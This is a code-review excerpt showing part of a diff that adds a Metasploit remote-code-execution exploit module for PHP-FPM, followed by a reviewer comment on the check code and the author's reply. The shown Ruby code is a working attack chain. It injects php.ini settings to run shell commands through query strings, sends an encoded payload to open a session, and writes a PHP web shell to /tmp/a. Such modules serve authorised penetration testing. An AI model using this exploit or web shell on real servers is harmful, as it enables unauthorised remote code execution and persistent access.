modules/exploits/multi/http/php_fpm_rce.rb

```diff
@@ -0,0 +1,440 @@
+    if datastore['CustomHeaderLengthHint']
+      vprint_status(
+        "Using custom header length hint for max length (customh_length="\
+        "#{datastore['CustomHeaderLengthHint']})"
+      )
+      customh_length = datastore['CustomHeaderLengthHint']
+    end
+    detect_method = self.class.detect_methods[datastore['DetectMethod']]
+    return repeat_operation(
+      :send_params_detection,
+      qsl_candidates: qsl_candidates,
+      customh_length: customh_length,
+      detect_method: detect_method
+    )
+  end
+
+  def send_attack_chain
+    [
+      "short_open_tag=1",
+      "html_errors=0",
+      "include_path=/tmp",
+      "auto_prepend_file=a",
+      "log_errors=1",
+      "error_reporting=2",
+      "error_log=/tmp/a",
+      "extension_dir=\"<?=`\"",
+      "extension=\"$_GET[a]`?>\""
+    ].each do |php_setting|
+      vprint_status("Sending php.ini setting: #{php_setting}")
+      res = set_php_setting(
+        php_setting: php_setting,
+        qsl: @params[:qsl],
+        customh_length: @params[:customh_length],
+        query_string_prefix: "a=/bin/sh+-c+'#{CHECK_COMMAND}'%26"
+      )
+      if res
+        return res if res.body.include?(SUCCESS_PATTERN)
+      else
+        print_error("Error when setting #{php_setting}")
+        return nil
+      end
+    end
+    return nil
+  end
+
+  def send_payload
+    disconnect(client) if client&.conn?
+    send_crafted_request(
+      path: '/',
+      qsl: @params[:qsl],
+      customh_length: @params[:customh_length],
+      prefix: "a=#{payload.encoded}%26",
+      allow_retry: false
+    )
+    sleep(1)
+    return session_created? ? true : nil
+  end
+
+  def send_backdoor_cleanup
+    cleanup_command = ";echo '<?php echo `$_GET[a]`;return;?>'>/tmp/a"
+    res = send_crafted_request(
+      path: '/',
+      qsl: @params[:qsl],
+      customh_length: @params[:customh_length],
+      prefix: "a=#{URI.encode(cleanup_command)};#{CHECK_COMMAND}%26"
+    )
+    return res if res&.body.include?(SUCCESS_PATTERN)
+    return nil
+  end
+
+  def detect_qsl
+    qsl_candidates = []
+    if datastore['QSLHint']
+      vprint_status("Skipping qsl detection, using hint (qsl=#{datastore['QSLHint']})")
+      qsl_candidates << datastore['QSLHint']
+    else
+      (datastore['MinQSL']..datastore['MaxQSL']).step(datastore['QSLDetectStep']) do |qsl|
+        res = send_crafted_request(path: "/PHP\nabcdefghijklmopqrstuv.php", qsl: qsl)
+        unless res
+          vprint_error("Error when sending query with QSL=#{qsl}")
+          next
+        end
+        if res.code != @base_status
+          vprint_status("Status code #{res.code} for qsl=#{qsl}, adding as a candidate")
+          qsl_candidates << qsl
+        end
+      end
+    end
+    qsl_candidates
+  end
+
+  def check
+    print_status("Sending baseline query...")
+    res = send_crafted_request(path: "/path\ninfo.php")
+    return Exploit::CheckCode::Detected("Error when sending baseline query") unless res
```

Comment:
`CheckCode::Detected` is probably not the correct check code to use here, as I suspect `res` could be `nil` in the event of connection failure, which could imply that the target is not routable, or there's no HTTP service listening on `rport`.

See: https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method

Reply:
Got it! I changed this to `Exploit::CheckCode::Unknown` in 1b54d27301.